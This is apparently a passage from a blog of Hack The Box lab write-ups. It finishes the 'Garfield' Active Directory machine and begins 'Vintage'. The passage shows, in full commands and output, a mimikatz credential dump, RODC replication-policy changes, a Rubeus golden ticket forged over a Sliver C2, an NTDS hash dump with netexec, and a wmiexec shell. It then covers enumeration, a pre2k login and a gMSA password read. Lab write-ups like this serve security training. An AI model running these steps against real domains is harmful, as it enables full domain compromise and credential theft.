Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RODC01$
Domain            : GARFIELD
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:02 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : rodc01$
         * Domain   : GARFIELD.HTB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 24091 (00000000:00005e1b)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/6/2026 6:12:59 AM
SID               : 
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:02 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 26925 (00000000:0000692d)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:01 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : RODC01$
         * Domain   : garfield.htb
         * Password : ab b9 15 b0 b3 c6 d3 2c ce ef 0f fb dc 3b 11 27 fd 34 b7 3d 3e 19 aa 02 5c f4 80 01 ae 8c d7 4a a7 85 ce 92 b7 c2 a4 71 e3 77 97 c8 f4 0b e1 4e 8d ac 75 9d 95 ff b3 bd 82 c5 f5 4b f0 30 6c 25 14 30 2b c1 f6 9a d8 8c 4d d3 cd 45 33 98 cc de 0d e0 fe ee 82 f7 a3 f4 d8 ac 62 33 7a 52 32 46 ab 88 b8 1f ef 57 bc c1 35 2b 73 7b 5c a2 63 21 b8 e0 1e 89 24 01 a3 32 83 bd e8 76 7f ed 76 37 09 40 c0 27 81 e6 bb 38 3b df 63 09 a1 f0 49 ce ef f7 42 e3 92 cc 68 d0 e9 03 d9 3b 83 93 91 6e 20 06 4f df fa 3e 7f 6b ad 9c 99 eb ef 4a 24 f1 d5 7f c9 c9 d2 95 b0 a0 05 2c 56 60 6b 90 45 71 67 a8 fa 0f e9 c6 51 08 42 e0 33 41 fd 15 7f c1 36 3d 2d 0c a2 cd d6 c5 3c 87 30 70 86 cd 0a e3 70 f1 62 fe 4b d3 cf 1e 8a 36 6c fd a8 eb 12 5d 
        ssp :
        credman :

Authentication Id : 0 ; 26768 (00000000:00006890)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:01 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : RODC01$
         * Domain   : garfield.htb
         * Password : ab b9 15 b0 b3 c6 d3 2c ce ef 0f fb dc 3b 11 27 fd 34 b7 3d 3e 19 aa 02 5c f4 80 01 ae 8c d7 4a a7 85 ce 92 b7 c2 a4 71 e3 77 97 c8 f4 0b e1 4e 8d ac 75 9d 95 ff b3 bd 82 c5 f5 4b f0 30 6c 25 14 30 2b c1 f6 9a d8 8c 4d d3 cd 45 33 98 cc de 0d e0 fe ee 82 f7 a3 f4 d8 ac 62 33 7a 52 32 46 ab 88 b8 1f ef 57 bc c1 35 2b 73 7b 5c a2 63 21 b8 e0 1e 89 24 01 a3 32 83 bd e8 76 7f ed 76 37 09 40 c0 27 81 e6 bb 38 3b df 63 09 a1 f0 49 ce ef f7 42 e3 92 cc 68 d0 e9 03 d9 3b 83 93 91 6e 20 06 4f df fa 3e 7f 6b ad 9c 99 eb ef 4a 24 f1 d5 7f c9 c9 d2 95 b0 a0 05 2c 56 60 6b 90 45 71 67 a8 fa 0f e9 c6 51 08 42 e0 33 41 fd 15 7f c1 36 3d 2d 0c a2 cd d6 c5 3c 87 30 70 86 cd 0a e3 70 f1 62 fe 4b d3 cf 1e 8a 36 6c fd a8 eb 12 5d 
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RODC01$
Domain            : GARFIELD
Logon Server      : (null)
Logon Time        : 4/6/2026 6:12:58 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : rodc01$
         * Domain   : GARFIELD.HTB
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

[server] sliver (INTEGRAL_RISK) > mimikatz "token::elevate" "privilege::debug" "lsadump::lsa /inject /name:krbtgt_8245" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
. . .[SNIP]. . .

 * Kerberos-Newer-Keys
    Default Salt : GARFIELD.HTBkrbtgt_8245
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
      aes128_hmac       (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
      des_cbc_md5       (4096) : d540fe6192b9ecfe

 * NTLM-Strong-NTOWF
    Random Value : f4b51c2c0d006172304e31dbc6e0de6b

mimikatz(commandline) # exit
Bye!

And we get our AES256 hash.

d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240

Now before forging, we need to modify the RODC password policy, making a TierZero such as Administrator is eligible for caching.

For that we will use L.Wilson_ADM access.

Tier Zero Abuse

Only back with bloodyAD

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 set object 'RODC01$' msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=HTB' -v 'CN=Administrator,CN=Users,DC=garfield,DC=HTB'
[+] RODC01$'s msDS-RevealOnDemandGroup has been updated

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 set object 'RODC01$' msDS-NeverRevealGroup                                                                                                                                 
[+] RODC01$'s msDS-NeverRevealGroup has been updated

Done, now we can do Golden ticket attack.

Sliver C2 and Rubeus Loader

Back to Sliver:

rubeus --in-process golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

[server] sliver (INTEGRAL_RISK) > rubeus --in-process golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : GARFIELD.HTB (GARFIELD)
[*] SID            : S-1-5-21-2502726253-3859040611-225969357
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : garfield.htb

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'administrator@garfield.htb'

[*] AuthTime       : 4/6/2026 9:12:54 AM
[*] StartTime      : 4/6/2026 9:12:54 AM
[*] EndTime        : 4/6/2026 7:12:54 PM
[*] RenewTill      : 4/13/2026 9:12:54 AM

[*] base64(ticket.kirbi):

      doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB6bLXLBJFCWb9uZx/q7aADcKFlBGN3V2WuJ4MlmaBb9py9qsNQC+UDgbjcLMilgo/To/WTuCZS6Jy7ZwoiEpaxeexAn1xxBrZoaU7VbQP1vxrkw5oWnAxan4q0HnPGOPxgvz+o8vLlVMbE6I0MDpdyhDoqwaozQhqvfswL+RrvHRi5x8MvTT3D7SbgLl2UlIhy2z2UReaBfb96VWcJx657lOrFhqL1m11hueXvaEfIIfinv3pqQwxrxZBjqF2pfJAur051VHREUUhNFWSb59hFYfphRL9W3VPaw/NgyrmNOASybQaIq4nW7jm5pE98QvWOqmyriJ26FIfEvjZkJ9boNO66YlSmOTsMgjFpILXyN4TsJEBBdW1ciU8QsVeW4ZRRqqj5luUxde7k9+aHT+9/e96e5O1v2ABXGRj4RPRqWa0Jb/SNej71NHvZH+mkInLF9YGibEitT3amIL17j1gJJNQ4iv/buIm7tlN4b+z0rTd7J8nRqODLT+2W2StYhbgu8l5E72o9oxR5/xUTShj4g5Up4J2diXRakGJWPDK1YY36+ZoZGe7R7Ieo65s7NdqEVeooM7q9nI8qt1TJXjkkb8taTp/QUahGEFHbkjXK+HrcKnDvSPH4NPca6C7Sm4UzZz+gW0ySZipxaKwgfGLFia6K8D622xv2VLuY67h2QK4vv3Xi1/rN1f3bJcwpCbHneOu3/dRE8JbxnYKGRSMXP/4d0QNU2xHrOxTRiP3IAXF+BPmV3o5/ByIVaO3t30BWf3TFwkC197F+djE1TuBItpQ1x0PJLeQKbdC4edPqauHzKqBBWv3LuMUHyDEjKIbBCwl5l/wpZkk9e2NwGxE2YgpcjRu23srTn8ipuS+K7P0We1iINKHgVd5SGOrye8/rRWDZItNwzvC0FUN6TNOpgXQt0ci/or5mfq+tJP6BeNrCt6FDb28UNG+BsXcRwcx40fWmSWplxYglyohAY8UgYPlMad9s6YXzRZSA4zr6fMsuTttnARtRPZU7ZSMx97vcbHr+frdl0sQ9aDC9I2CBc4pLs7i15sUhBo8y4ITY/70VNw5C76XjMl4LA6xfIYxDVFnuWPiztXSMU/i54olKMUXPpyxZvSwQVjB0VsVUmgDwqXpF0/WldXg46Io60yYgjf++9szhQuupc/majZOqaSqnEVSHbYZymp47MO5thjWGjHe+1n174VVSPKsyZVRf2nI7gu1w8DaQXqPp5p17g9lvlWJtSdf+LIKlp0Q9XPr+A0QRCnHT8vN7V7b05z+9pnraqsU+8ZEnJkAvDn10Mpb8xmSYC1IXlkFhnD5UjvS04YvERY+H7dQHnQMuPxbnuq1zmkKS3BH7yWoWopx83Y94vpcSp13TL7O/scKTh5L1XMY3qLysuDpIU0Gb/o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQg9Ex0vcPyjc3ihyw+j94DUZAJ6x9s8aYU3C5Yj8rhyrqhDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQwNjE2MTI1NFqlERgPMjAyNjA0MDYxNjEyNTRaphEYDzIwMjYwNDA3MDIxMjU0WqcRGA8yMDI2MDQxMzE2MTI1NFqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=


[*] Ticket written to administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi




[server] sliver (INTEGRAL_RISK) > download administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi

[*] Wrote 1430 bytes (1 file successfully, 0 files unsuccessfully) to administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi

Now we have the kirbi file, let’s just convert the ticket.

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-ticketConverter administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi administrator.ccache 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

We now have the ticket:

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=administrator.ccache                                         
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@GARFIELD.HTB

Valid starting       Expires              Service principal
04/06/2026 12:12:54  04/06/2026 22:12:54  krbtgt/garfield.htb@GARFIELD.HTB
        renew until 04/13/2026 12:12:54

DCSycn Attack and Gain Main DC Administrator

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01 -u Administrator --use-kcache --ntds
SMB         DC01            445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         DC01            445    DC01             [+] GARFIELD.HTB\Administrator from ccache (Pwn3d!)
SMB         DC01            445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         DC01            445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee238f6debc752010428f20875b092d5:::
SMB         DC01            445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         DC01            445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:077a59724e58efbf6608853652a66f80:::
SMB         DC01            445    DC01             krbtgt_8245:1603:aad3b435b51404eeaad3b435b51404ee:445aa4221e751da37a10241d962780e2:::
SMB         DC01            445    DC01             garfield.htb\j.arbuckle:3101:aad3b435b51404eeaad3b435b51404ee:f705091e5d14d5c25ace5f52ea4d8ecb:::
SMB         DC01            445    DC01             garfield.htb\l.wilson:3105:aad3b435b51404eeaad3b435b51404ee:dc6e2c16d8baac7cc239f160783ae2b0:::
SMB         DC01            445    DC01             garfield.htb\l.wilson_adm:3107:aad3b435b51404eeaad3b435b51404ee:798a21df6df33f3b2cf9eeb2adc99fef:::
SMB         DC01            445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:22acecfd924465afc92bf3c3631bbc91:::
SMB         DC01            445    DC01             RODC01$:1602:aad3b435b51404eeaad3b435b51404ee:0a3f810964bb5e1f0e52245f73700172:::
SMB         DC01            445    DC01             DC02$:10601:aad3b435b51404eeaad3b435b51404ee:9f3091c0127448716fd54ba4fa078db4:::
SMB         DC01            445    DC01             [+] Dumped 10 NTDS hashes to /root/.nxc/logs/ntds/DC01_DC01_2026-04-06_121908.ntds of which 7 were added to the database
SMB         DC01            445    DC01             [*] To extract only enabled accounts from the output file, run the following command: 
SMB         DC01            445    DC01             [*] grep -iv disabled /root/.nxc/logs/ntds/DC01_DC01_2026-04-06_121908.ntds | cut -d ':' -f1

Now we can just logon (I know dumping the NTLM hashes is very important for you guys):

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-wmiexec administrator@DC01 -k -no-pass                                                                         
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
garfield\administrator

C:\>hostname
DC01

That’s it!

PS: I kinda feel this machine is having much the same kit as me doing “HTB DarkZero” but the much complicated haha!!

Even the dual Admin and dual C2 really (TBH I recommend Garfield with havoc as C2)

labs.hackthebox.com/achievement/machine/2489228/862

Until next time and Happy Hacking!

HTB Vintage - Windows (Hard)

Sulaiman — Mon, 27 Apr 2026 13:50:29 GMT

From HTB: -

PS And Notes:

Infra Hardened with active Defender and AMSI
NTLM Authentication Disabled
Administrator Can’t logon

But still AD playable due to LDAP Objects, and strong Kerberos related.

This write-up is going to be fast-forward:

Gain User
Gain NT SYSTEM

An assumed breach scenario so we start with a creds:

user: P.Rosa
passwd: Rosaisbest123

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.129.231.205
PING 10.129.231.205 (10.129.231.205) 56(84) bytes of data.
64 bytes from 10.129.231.205: icmp_seq=1 ttl=127 time=387 ms
64 bytes from 10.129.231.205: icmp_seq=2 ttl=127 time=383 ms

--- 10.129.231.205 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 382.898/385.195/387.492/2.297 ms

Continue with Nmap Scanning:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.231.205 -oA nmap/nmap                                              
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.231.205
Host is up (0.48s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49676/tcp open  unknown
49687/tcp open  unknown
60731/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,3268-3269,5985,9389 -sC -sV 10.129.231.205 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for DC01 (10.129.231.205)
Host is up (0.39s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-07 03:29:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: 2m25s
| smb2-time: 
|   date: 
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

Not many finger-print tho!!

Assumed Breach Enumeration with NetExec

After trying the credential, we know that this machine have strong Kerberos related, on NetExec you need to specify the -k flag so it can confirmed the authentication.

The good news is the Machine doesn’t have critical Clow-SKEW so fake-timing is not essential.

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123

And we got our domain and HOST:

DC01 dc01.vintage.htb vintage.htb

After some enumeration, there’s nothing interesting on the SMB shares so I just BloodHound with NetExec:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --bloodhound -c all --dns-server 10.129.231.205
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01.vintage.htb 389    DC01             Resolved collection methods: localadmin, objectprops, dcom, rdp, acl, trusts, psremote, group, container, session
LDAP        dc01.vintage.htb 389    DC01             Using kerberos auth without ccache, getting TGT
LDAP        dc01.vintage.htb 389    DC01             Done in 1M 25S
LDAP        dc01.vintage.htb 389    DC01             Compressing output into /root/.nxc/logs/DC01_dc01.vintage.htb_2026-04-06_233035_bloodhound.zip

Then I create a krb5 config files, and get bunch of users from the credential features:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --users                                        
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01.vintage.htb 389    DC01             [*] Enumerated 14 domain users: vintage.htb
LDAP        dc01.vintage.htb 389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        dc01.vintage.htb 389    DC01             Administrator                 2024-06-08 07:34:54 0        Built-in account for administering the computer/domain      
LDAP        dc01.vintage.htb 389    DC01             Guest                         2024-11-13 09:16:53 1        Built-in account for guest access to the computer/domain    
LDAP        dc01.vintage.htb 389    DC01             krbtgt                        2024-06-05 06:27:35 0        Key Distribution Center Service Account                     
LDAP        dc01.vintage.htb 389    DC01             M.Rossi                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             R.Verdi                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             L.Bianchi                     2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             G.Viola                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             C.Neri                        2024-06-05 17:08:13 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             P.Rosa                        2024-11-06 07:27:16 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_sql                       2026-04-06 23:32:04 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_ldap                      2024-06-06 09:45:27 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_ark                       2024-06-06 09:45:27 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             C.Neri_adm                    2024-06-07 06:54:14 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             L.Bianchi_adm                 2024-11-26 06:40:30 0

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --generate-krb5-file /etc/krb5.conf 
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] krb5 conf saved to: /etc/krb5.conf
SMB         dc01.vintage.htb 445    dc01             [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/krb5.conf                                                                            
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB

For bit of information, some of the users have identical users with specified Admin name (could be extra access/rights)!!

┌──(kali㉿kali)-[~]
└─$ cat users.txt 
Administrator
Guest
krbtgt
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

On BloodHound, turns out I didn’t have any OOB, but I found another computers account, which potentially affect our NetExec collectors due to non-local DNS name:

And now we got:

FS01.vintage.htb FS01 vintage.htb

And we saw PRE-2000 group which potentially being Pre2K Attack. Now let’s re-collect the Graph fix.

Active Directory BloodHound (Part 01)

Now I’ll use BloodHound-Python

┌──(kali㉿kali)-[~]
└─$ sudo bloodhound-ce-python -u P.Rosa -p Rosaisbest123 -k -d vintage.htb -dc dc01.vintage.htb -ns 10.129.231.205 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The resolution lifetime expired after 3.102 seconds: Server Do53:10.129.231.205@53 answered The DNS operation timed out.
INFO: Done in 01M 22S
INFO: Compressing output into 20260406234346_bloodhound.zip

Lets see the graph:

After collectors P.Rosa account still doesn’t have any OOB:

But she is path of PRE-2000 Windows Group:

But On NetExec -M pre2k I’ve got blank result, don’t wether it’s REALM access or wrong flag but eventually I did the pre2k manually and It’s a success.

PS: We already know the computers account of FS01, and we’ve got a pairs of:

user: FS01$
passwd: fs01

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u 'FS01$' -p fs01 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\FS01$:fs01

So let’s see what’s next after FS01 machine access.

This guy have one out-bound object of reading gMSA password from user gMSA01$:

Then user gMSA01$ also have one OOB:

Which an ability to addSelf and GenericWrite to a group of “ServiceManagers”

Eventually that Group of “ServiceManagers“ have 3 out-bound object control:

Which is 3 “GenericAll to 3 Service account (SVC):

SVC_SQL
SVC_LDAP
SVC_ARK

But all of the 3 SVC, everyone have the same access and no more out-bound object control.

Looking at SVC_SQL this guy have false “trust for delegations” and looking at 3 GenericAll I was thinking of:

Shadow Credentials
Kerberoasting all (Needed to implant SPN to all)

Moreover let’s move laterally from this Graph:

Lateral Movement to “ServiceManagers Group”

Gain Ticket of FS01$ computer:

┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/'FS01$':fs01 -k                         
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in FS01$.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME='FS01$.ccache'

Then read gMSA password of gMSA01$ account:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u 'FS01$' -p fs01 -k --gmsa
